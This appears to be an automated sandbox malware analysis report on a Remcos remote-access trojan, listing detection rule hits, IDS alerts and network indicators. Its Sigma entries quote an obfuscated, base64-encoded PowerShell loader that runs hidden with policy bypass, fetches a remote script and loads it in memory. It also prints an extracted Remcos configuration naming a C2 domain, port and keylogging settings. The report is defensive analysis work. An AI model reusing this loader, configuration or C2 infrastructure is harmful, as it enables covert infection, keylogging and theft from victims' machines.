uUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJ
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T16:44:47.326073+010020365941Malware Command and Control Activity Detected192.168.2.114976337.120.208.4056379TCP
              2025-02-11T16:44:51.466725+010020365941Malware Command and Control Activity Detected192.168.2.114978837.120.208.4056379TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T16:44:51.005874+010028033043Unknown Traffic192.168.2.1149794178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T16:44:44.598876+010018100002Potentially Bad Traffic192.168.2.1149749168.119.145.117443TCP
              2025-02-11T16:45:01.112098+010018100002Potentially Bad Traffic192.168.2.1149857168.119.145.117443TCP
              2025-02-11T16:45:14.615270+010018100002Potentially Bad Traffic192.168.2.1149936168.119.145.117443TCP
              2025-02-11T16:45:27.551520+010018100002Potentially Bad Traffic192.168.2.1149975168.119.145.117443TCP
              2025-02-11T16:45:41.309490+010018100002Potentially Bad Traffic192.168.2.1149977168.119.145.117443TCP
              2025-02-11T16:45:54.872761+010018100002Potentially Bad Traffic192.168.2.1149978168.119.145.117443TCP
              2025-02-11T16:46:09.150870+010018100002Potentially Bad Traffic192.168.2.1149979168.119.145.117443TCP
              2025-02-11T16:46:22.952533+010018100002Potentially Bad Traffic192.168.2.1149980168.119.145.117443TCP
              2025-02-11T16:46:41.711257+010018100002Potentially Bad Traffic192.168.2.1149981168.119.145.117443TCP
              2025-02-11T16:46:59.180008+010018100002Potentially Bad Traffic192.168.2.1149982168.119.145.117443TCP
              2025-02-11T16:47:15.635347+010018100002Potentially Bad Traffic192.168.2.1149983168.119.145.117443TCP
              2025-02-11T16:47:32.598920+010018100002Potentially Bad Traffic192.168.2.1149984168.119.145.117443TCP
              2025-02-11T16:47:51.346525+010018100002Potentially Bad Traffic192.168.2.1149985168.119.145.117443TCP
              2025-02-11T16:48:10.458180+010018100002Potentially Bad Traffic192.168.2.1149986168.119.145.117443TCP
              2025-02-11T16:48:28.334790+010018100002Potentially Bad Traffic192.168.2.1149987168.119.145.117443TCP
              2025-02-11T16:48:47.915327+010018100002Potentially Bad Traffic192.168.2.1149988168.119.145.117443TCP
              2025-02-11T16:49:02.915450+010018100002Potentially Bad Traffic192.168.2.1149989168.119.145.117443TCP
              2025-02-11T16:49:15.496308+010018100002Potentially Bad Traffic192.168.2.1149990168.119.145.117443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 15.2.powershell.exe.8c91288.2.raw.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.3145606062.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2656381876.0000000007361000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2515947583.0000000009427000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.2953604842.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2705660969.0000000008D17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2116165246.0000000008B77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2296515608.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2273047650.0000000007280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2454927477.0000000007B30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1780515876.0000000008670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.4187297645.00000000080A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003A.00000002.3443687584.0000000008D07000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2100059153.0000000007190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2489969413.00000000089F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2671409010.000000000741E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1784027157.0000000008C97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.3856215786.0000000008704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1954330388.0000000008DB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000035.00000002.2648336815.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2287089513.00000000081C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: powershell.exe, 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_333593b5-f

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49975 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49978 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49980 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49981 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49982 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49983 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49984 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49985 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49986 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49987 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49990 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49788 -> 37.120.208.40:56379
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49763 -> 37.120.208.40:56379
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: abokirem.duckdns.org
              Connects to many ports of the same IP (likely port scanning)
              Source: global trafficTCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
              Uses dynamic DNS services
              Source: unknownDNS query: name: abokirem.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.11:49763 -> 37.120.208.40:56379
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 37.120.208.40 37.120.208.40
              Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49794 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49749 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49975 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49978 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49857 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49985 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49984 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49982 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49977 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49979 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49988 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49983 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49989 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49990 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49936 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49986 -> 168.119.145.117:443
              Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49981 -> 168.119.145.117:443
